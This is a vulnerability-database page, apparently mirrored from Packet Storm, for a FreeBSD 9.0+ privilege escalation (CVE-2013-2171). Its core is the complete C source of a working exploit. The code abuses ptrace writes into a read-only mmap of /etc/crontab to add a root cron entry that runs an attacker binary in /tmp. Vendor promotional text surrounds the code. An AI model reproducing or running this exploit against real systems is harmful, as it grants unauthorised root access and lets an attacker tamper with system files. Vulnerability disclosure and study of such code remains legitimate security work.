Lucene search
K

FreeBSD 9.0+ Privilege Escalation

🗓️ 22 Jun 2013 00:00:00Reported by SynQType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 57 Views

FreeBSD 9.0+ Privilege Escalation CVE-2013-217

Related
Code
`/*   
* CVE-2013-2171 FreeBSD 9.0+ Privilege escalation via mmap  
*  
* poc by SynQ, rdot.org, 6/2013  
*  
* don't forget to cp /etc/crontab /tmp  
*  
*/  
#include <unistd.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <sys/mman.h>  
#include <sys/ptrace.h>  
#include <sys/wait.h>  
#include <fcntl.h>  
#include <sys/types.h>  
  
char sc[]="*\t*\t*\t*\t*\troot\t/tmp/bukeke\n#";  
  
void child() {  
int status;  
  
status = ptrace(PT_TRACE_ME, 0, 0, 0);  
if (status != 0)  
printf("child ptrace error\n");  
exit(1);  
}  
  
int main() {  
int pid, fd, i;  
char *addr;  
  
fd = open("/etc/crontab", O_RDONLY);  
if (fd<0) {  
printf("open failed\n");  
exit(1);  
}  
  
addr = mmap(0, 4096, PROT_READ, MAP_SHARED, fd, 0);  
if (addr == MAP_FAILED) {  
printf("mmap fault\n");  
exit(1);  
}  
  
pid = fork();  
if (pid == -1) {  
printf("fork failed\n");  
exit(1);  
}  
else if (pid == 0)  
child();  
  
ptrace(PT_ATTACH, pid, 0, 0);  
if (wait(0) == -1) {  
printf("wait failed\n");  
exit(1);  
}  
printf("writing shellcode...\n");  
  
for(i=0; i < sizeof(sc)/4; i++)  
ptrace(PT_WRITE_D, pid, addr+i*4, *(int*)&sc[i*4]);  
  
ptrace(PT_DETACH, pid, 0, 0);  
if (wait(0) == -1) {  
printf("wait2 failed\n");  
exit(1);  
}  
  
printf("done.\n");  
return 0;  
}  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Jun 2013 00:00Current
1Low risk
Vulners AI Score1
EPSS0.2417
57